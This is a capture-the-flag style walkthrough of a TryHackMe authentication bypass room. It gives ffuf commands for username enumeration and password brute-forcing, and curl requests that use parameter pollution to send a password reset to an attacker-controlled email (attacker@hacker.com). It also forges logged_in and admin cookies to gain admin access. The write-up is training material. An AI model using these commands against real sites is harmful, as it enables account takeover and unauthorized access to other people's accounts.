Authentication Bypass (Write-up/Walkthrough)
Introduction
It is a relatively easy room to help you understand some authentication bypass techniques feel free to ask me about anything at Twitter and Linkedin
The Writeup/Walkthrough
NOTE: I really recommend using the try hack me attack box in order not to have problems deploying the tools or downloading the wordlists
First, we need to deploy the machine and go to this link http://MACHINE_IP/customers/signup (Replace Machine IP with your Machine Ip)
Task 2 Username Enumeration
In this task, the author mentioned a really smart technique which is:
When we try to log in using username:admin password:admin we get an error message “An account with this username already exists” (#ILoveErrors), this error is important because now we can try a lot of usernames and if we get this error this means that the username is in the database (Of course we won't try it one by one we will use AUTOMATION aka a tool called FFUF)
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists" > valid_usernames.txtFFUF: FFUF is an acronym for “fuzz faster you fool!”. In one line, ffuf is an open-source web fuzzing tool developed in go used to identify hidden resources. But first, we understand what Fuzzing is? It is a process of sending random inputs to get errors or unexpected output.
-w: selects the file’s location on the computer that contains the list of usernames that we’re going to check exists
SecLists: SecLists is the security tester’s companion. It’s a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
-X: specifies the request method
POST: this will be a GET request by default, but it is a POST request in our example
-d: specifies the data that we are going to send. In our example, we have the fields username, email, password, and cpassword
username: username field
email: email field
password: password field
cpassword: cpassword field
FUZZ: In the ffuf tool, the FUZZ keyword signifies where the contents from our wordlist will be inserted in the request.
-H: used for adding additional headers to the request. In this instance, we’re setting the Content-Type to the webserver knows we are sending form data.
Content-Type: setting the Content-Type to the webserver knows we are sending form data
-u: specifies the URL we are making the request to
-mr: the text on the page we are looking for to validate we’ve found a valid username.
>: outputting command
valid_usernames.txt: The file name we are putting the output into
now we gonna open the file using any text editor
nano valid_usernames.txtnow we have the usernames (if you got any weird symbols delete them and just leave the names one in each line so you dont have errors in task 3)
Task 3 Brute Force
What does brute force mean?
A brute force attack is an automated process that tries a list of commonly used passwords against either a single username or, like in our case, a list of usernames.
Now we will try to brute force the login page using fuzzing (ffuf)
Note: When running this command, make sure the terminal is in the same directory as the valid_usernames.txt file.
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200(Don't forget to change the IP)
This ffuf command is a little different from the previous one in Task 2. Previously we used the FUZZ keyword to select where in the request the data from the wordlists would be inserted, but because we’re using multiple wordlists, we have to specify our own FUZZ keyword
W1: we’ve chosen W1 for our list of valid usernamesW2: we’ve chosen W1 for our list of valid passwords -w: The multiple wordlists are again specified with the -w separated with a comma-fc: For a positive match, we’re using the -fc argument to check for an HTTP status code other than 200.
Task 4 Logic Flaw
We’re going to examine the Reset Password function of the Acme IT Support website (http://MACHINE_IP/customers/reset). We see a form asking for the email address associated with the account on which we wish to perform the password reset. If an invalid email is entered, you’ll receive the error message “Account not found from supplied email address”.
For demonstration purposes, we’ll use the email address robert@acmeitsupport.thm which is accepted. We’re then presented with the next stage of the form, which asks for the username associated with this login email address. If we enter robert as the username and press the Check Username button, you’ll be presented with a confirmation message that a password reset email will be sent to robert@acmeitsupport.thm.
In the second step of the reset email process, the username is submitted in a POST field to the web server, and the email address is sent in the query string request as a GET field.
curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'(Don't forget to change the IP)
-H: to add an additional header to the request
In this instance, we are setting the Content-Type to application/x-www-form-urlencoded, which lets the web server know we are sending form data so it properly understands our request.
In the application, the user account is retrieved using the query string, but later on, in the application logic, the password reset email is sent using the data found in the PHP variable $_REQUEST.
The PHP $_REQUEST variable is an array that contains data received from the query string and POST data. If the same key name is used for both the query string and POST data, the application logic for this variable favors POST data fields rather than the query string, so if we add another parameter to the POST form, we can control where the password reset email gets delivered.
curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'(Don't forget to change the IP)
Now we need to make an account on the website
For the next step, you’ll need to create an account on the Acme IT support customer section, doing so gives you a unique email address that can be used to create support tickets. The email address is in the format of {username}@customer.acmeitsupport.thm
Now rerunning Curl Request 2 but with your @acmeitsupport.thm in the email field you’ll have a ticket created on your account which contains a link to log you in as Robert. Using Robert’s account, you can view their support tickets and reveal a flag
curl 'http://MACHINE_IP/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'(Don't forget to change the IP)
now we can sign in using the support ticket on the website if we signed in with our account
Task 5 Cookie Tampering
First, we’ll start just by requesting the target page:
curl http://MACHINE_IP/cookie-test(Don't forget to change the IP)
We can see we are returned a message of: Not Logged In
Now we’ll send another request with the logged_in cookie set to true and the admin cookie set to false:
curl -H "Cookie: logged_in=true; admin=false" http://MACHINE_IP/cookie-test(Don't forget to change the IP)
We are given the message: Logged In As A User
Finally, we’ll send one last request setting both the logged_in and admin cookie to true:
curl -H "Cookie: logged_in=true; admin=true" http://MACHINE_IP/cookie-test
This returns the result: Logged In As An Admin as well as a flag which you can use to answer question one.
We will use this website to decrypt md5
We will use this website to decrypt/encrypt base64
/etc/takeaways
I learned more about ffuf, curl, encryption/decryption, and authentication bypass techniques
